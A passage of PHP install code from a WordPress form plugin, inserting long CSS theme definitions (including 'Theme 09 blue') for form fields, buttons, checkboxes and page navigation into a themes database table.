visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/09/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/09/next.png) no-repeat right;\r\n	padding: 0px 36px 0  20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/09/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #E9B500;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #DDDDDD;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\npadding:10px;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #013D7C;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 5px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #E9B500;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #7F7F7F !important;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 1px solid #B7B7B7;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/09/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8B8B8B;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #808080;\r\nbackground-color: #E5E5E5;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-left:3px;\r\nmargin-bottom:2px;\r\n}\r\n.page_active {\r\n	color: #C2C2C2;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #7F7F7F;\r\nmargin-left:3px;\r\nmargin-bottom: -1px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nborder-spacing: 0px;\r\nheight: 10px;\r\nbackground: #E7C85C;\r\nfloat: left;\r\n}\r\n.page_percentage_deactive {\r\nheight: 10px;\r\nline-height: 20px;\r\nbackground-color: #E5E5E5;\r\ntext-align: left !important;\r\nmargin-bottom: 2px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\ncolor: #fff;\r\nfont-size: 12px;\r\nposition: relative;\r\nbackground: url([SITE_ROOT]/images/09/02/02.png) no-repeat;\r\nwidth: 36px;\r\ndisplay: inline-block;\r\nheight: 36px;\r\ntop: -37px;\r\nleft: 17px;\r\ntext-align: center;\r\nline-height: 27px;\r\nfloat: right;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 09 blue\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #DDDDDD;\r\nborder: 1px solid #015875;\r\nmargin-bottom: 10px;\r\ncolor: #015875;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #015875 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\nborder-top: 1px solid #7F7F7F !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 1px solid #B7B7B7;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/09/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/09/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	 background: url([SITE_ROOT]/images/09/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #015875;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #DDDDDD;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\npadding:10px;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #015875;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #015875;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #80ABBA !important;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 1px solid #B7B7B7;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/09/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8B8B8B;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #808080;\r\nbackground-color: #DEE9EC;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-left:3px;\r\nmargin-bottom:2px;\r\n}\r\n.page_active {\r\n	color: #C2C2C2;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #7F7F7F;\r\nmargin-left:3px;\r\nmargin-bottom: -1px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nborder-spacing: 0px;\r\nheight: 10px;\r\nbackground: #5C90A2;\r\nfloat: left;\r\n}\r\n.page_percentage_deactive {\r\nheight: 10px;\r\nline-height: 20px;\r\nbackground-color: #E5E5E5;\r\ntext-align: left !important;\r\nmargin-bottom: 2px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\ncolor: #fff;\r\nfont-size: 12px;\r\nposition: relative;\r\nbackground: url([SITE_ROOT]/images/09/03/02.png) no-repeat;\r\nwidth: 36px;\r\ndisplay: inline-block;\r\nheight: 36px;\r\ntop: -37px;\r\nleft: 17px;\r\ntext-align: center;\r\nline-height: 27px;\r\nfloat: right;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	